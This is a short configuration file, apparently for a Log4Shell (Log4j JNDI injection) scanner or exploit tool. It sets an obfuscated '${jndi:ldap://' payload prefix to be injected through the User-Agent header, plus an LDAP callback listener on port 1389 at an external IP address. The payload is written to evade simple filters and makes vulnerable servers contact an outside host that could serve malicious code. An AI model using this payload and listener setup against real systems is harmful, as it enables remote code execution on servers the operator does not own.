[default]
log_dir =/tmp
; primary_input =
; secondary_input =
payload_prefix = ${${lower:j}${lower:n}${lower:d}i:ldap://
header_field = User-Agent
async_session_limit = 10
listener_port = 1389
listener_ip = 34.85.249.103
webhook =
